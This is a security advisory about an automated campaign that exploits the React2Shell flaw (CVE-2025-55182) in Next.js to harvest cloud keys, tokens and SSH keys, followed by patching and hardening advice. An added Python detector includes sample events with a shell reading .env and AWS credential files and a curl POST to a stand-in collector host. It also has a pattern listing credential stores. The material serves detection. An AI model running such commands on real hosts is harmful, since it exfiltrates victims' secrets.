A large-scale automated credential harvesting campaign is actively exploiting CVE-2025-55182, the critical pre-authentication remote code execution vulnerability in React Server Components known as React2Shell. Researchers have confirmed at least 766 compromised hosts across multiple cloud providers and geographic regions, with the operation showing no signs of slowing down.

The Vulnerability

CVE-2025-55182 carries a maximum CVSS score of 10.0. The flaw affects React Server Components as implemented in Next.js and related frameworks, allowing remote unauthenticated attackers to achieve arbitrary code execution. The vulnerability was initially disclosed and patched in late 2025, with Microsoft publishing detailed defense guidance in December 2025. Despite patches being available for months, a significant number of internet-facing deployments remain unpatched.

The Campaign: UAT-10608

The threat cluster, tracked as UAT-10608, is running a highly automated operation. The attackers use scanning infrastructure, likely internet-wide search services such as Shodan or Censys, or custom-built scanners, to identify internet-exposed Next.js applications that remain vulnerable to React2Shell.

Once initial access is achieved through the RCE, the attackers deploy automated scripts and a purpose-built framework called NEXUS Listener to systematically harvest credentials and secrets from compromised hosts. NEXUS Listener includes a web-based GUI that provides operators with precompiled statistics on credentials harvested and hosts compromised, suggesting this is an organized, professionally operated campaign rather than opportunistic scanning.

What’s Being Stolen

The scope of credential theft is extensive. Confirmed exfiltrated data types include:

  • Cloud credentials: AWS access keys and secrets
  • Code repository tokens: GitHub and GitLab personal access tokens
  • Database connection strings: Full connection URIs with embedded credentials
  • SSH private keys: Enabling lateral movement across infrastructure
  • Payment processing keys: Stripe API keys
  • AI platform credentials: OpenAI and Anthropic API keys
  • Messaging tokens: Telegram bot credentials and webhook secrets
  • Shell command history: Potentially revealing additional infrastructure details and credentials

The attackers are essentially vacuuming up every secret they can find in environment variables, configuration files, and dotfiles on compromised hosts.

Impact Assessment

This campaign is particularly dangerous for several reasons. First, the vulnerability requires no authentication — any internet-facing Next.js application running a vulnerable version is a target. Second, the automated nature means the attackers can scale quickly. Third, the stolen credentials create a cascading risk: compromised AWS keys can lead to full cloud account takeover, stolen GitHub tokens can enable supply chain attacks, and exfiltrated database credentials can expose customer data.

Organizations running Next.js in production — particularly those with server-side rendering or React Server Components enabled — should treat this as an urgent priority. Google Cloud’s threat intelligence team and multiple security vendors have published analyses confirming the campaign’s scope and sophistication.

Mitigation Steps

Immediate actions:

  1. Patch Now. Update Next.js to a version that addresses CVE-2025-55182. If you’re still running a vulnerable version months after disclosure, this is a critical-priority upgrade.
  2. Rotate all secrets on any host that may have been exposed. This means AWS keys, database passwords, API tokens, SSH keys — everything. Assume compromise if your application was internet-facing and unpatched.
  3. Audit access logs for your cloud providers, code repositories, and payment platforms for unauthorized access using potentially stolen credentials.
  4. Check for IOCs. Look for connections to known NEXUS Listener C2 infrastructure. Review process execution logs for unexpected script activity following web application exploitation.
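As an added example, not code from the original article or from the cited vendor analyses, the following Python replays constructed process-execution events (auditd/EDR style) and flags interpreters spawned under a Next.js server process that read the credential stores listed above or invoke a transfer tool. The event layout, image paths, and sample values are assumptions.

```python
"""Added example (not from the original article): replay constructed process
events and flag interpreters spawned under a Next.js server that touch the
credential stores the campaign harvests.  Layout and values are assumptions."""
import re

# Constructed sample events: (timestamp, pid, ppid, image, cmdline).
EVENTS = [
    ("2026-01-10T10:00:01Z", 1200, 1, "/usr/bin/node", "node server.js"),
    ("2026-01-10T10:05:13Z", 1311, 1200, "/bin/sh", "sh -c 'cat /app/.env ~/.aws/credentials'"),
    ("2026-01-10T10:05:14Z", 1312, 1311, "/usr/bin/curl", "curl -s -X POST https://collector.example.invalid -d @-"),
    ("2026-01-10T10:06:01Z", 1401, 1, "/bin/sh", "sh -c 'cat /var/log/app.log'"),  # benign: parent is init
]

WEB_SERVER = re.compile(r"(^|/)(node|next)$")  # images that host the RSC app
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python3", "perl", "curl", "wget"}
# Credential stores the article lists as harvested (env files, cloud keys, SSH keys, git tokens, history).
SECRET_PATHS = re.compile(r"\.env\b|\.aws/credentials|\.ssh/|\.git-credentials|\.bash_history|\.npmrc")

def build_tree(events):
    parent, image = {}, {}
    for _ts, pid, ppid, img, _cmd in events:
        parent[pid], image[pid] = ppid, img
    return parent, image

def under_web_server(pid, parent, image):
    """True if any ancestor of pid is a node/next process."""
    seen, pid = set(), parent.get(pid)
    while pid and pid not in seen:
        seen.add(pid)
        if WEB_SERVER.search(image.get(pid, "")):
            return True
        pid = parent.get(pid)
    return False

def detect(events):
    """Return (timestamp, pid, image basename, reasons) for each suspicious event."""
    parent, image = build_tree(events)
    alerts = []
    for ts, pid, _ppid, img, cmd in events:
        base = img.rsplit("/", 1)[-1]
        # A web server has no routine reason to spawn a shell; reading credential stores or
        # running a transfer tool from that shell matches the campaign's post-exploitation behaviour.
        if base not in INTERPRETERS or not under_web_server(pid, parent, image):
            continue
        reasons = ["interpreter spawned under web server"]
        if SECRET_PATHS.search(cmd):
            reasons.append("reads credential store")
        if base in {"curl", "wget"}:
            reasons.append("outbound transfer tool")
        alerts.append((ts, pid, base, "; ".join(reasons)))
    return alerts
```

Feed it real process events from your EDR or auditd export in the same tuple layout; the unrelated shell under init shows that ancestry, not the shell itself, is what drives the alert.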

Longer-term hardening:

  • Never store secrets in environment variables or .env files on production servers. Use a secrets manager (AWS Secrets Manager, HashiCorp Vault, etc.).
  • Implement network segmentation so that a compromised web application cannot reach internal services or metadata endpoints.
  • Deploy a WAF with virtual patching rules for CVE-2025-55182 as a defense-in-depth measure.
  • Monitor for anomalous outbound connections from web application servers.